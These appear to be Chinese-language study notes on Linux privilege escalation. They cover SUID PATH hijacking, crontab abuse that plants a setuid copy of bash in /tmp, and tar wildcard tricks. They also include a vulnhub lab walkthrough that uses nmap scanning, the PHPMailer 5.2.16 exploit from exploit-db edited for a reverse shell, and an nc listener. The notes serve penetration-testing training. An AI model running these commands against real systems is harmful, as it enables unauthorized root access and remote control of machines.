配合SUID本地环境变量提权
思路原理:利用sh环境变量替换,使得/tmp/ps得到root权限;ps=sh
过程:手写调用文件-编译-复制文件-增加环境变量-执行
gcc demon1.c -o shell
cp /bin/sh /tmp/ps
export PATH=/tmp:$PATH # webshell权限无法设置环境变量
./shell
id
提前本地定时任务(crontab)安全
1、路径问题-利用计划任务指向文件相对路径解析问题
cat /ect/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/lcn/test.sh
chmod +x /home/lcn/test.sh
/tmp/bash
2、利用通配符配合命令参数自定义命令实习提权
原理:解压命令同时可以执行命令;
3、权限问题-利用不安全的权限分配操作导致定时任务覆盖;
chmod 777 775等 普通用户通过修改计划任务覆盖其达到命令执行效果;
添加权限 chmod +x test.sh;不正确操作为chmod 777 test.sh;
提前可通过ls -al查看所有文件权限;
linux提权数据-mysql-UDF-vulnhub靶场
1、nmap进行内网探测 nmap 192.168.127.0/24
2、全端口扫描;nmap -p1-65535 192.168.127.141
3、服务探测
4、webpath目录扫描(dirbuster),cms模块调用getshell
http://192.168.127.142/manual/
http://192.168.127.142/vendor/
5、搜索exp,getshell
| PHPMailerAutoload.php | |
 |
/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}。。。
version;
5.2.16
配置文件历史漏洞;
searchsploit phpmailer 搜索历史漏洞信息kali;
复制当前目录cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./
2、exploit-db中下载exp
修改exp vim 40974.py ,分别为上传地址,木马路径和木马上传路径;还有反弹shell地址;
启动脚本 python3 40974.py ,监听端口nc -lvvp 4444
后续参考查找mysql账密进行udf提权;
linux提权总结
1、提权环境-信息收集(SUID,定时任务,可能漏洞,第三方服务等)
2、最新相关漏洞要明确,二次开发相关脚本(shell编程)
3、本地msf-searchexploit脚本远程exploitdb站点搜索说明
4、其他提权方法如:密码复用、guid、sudo等
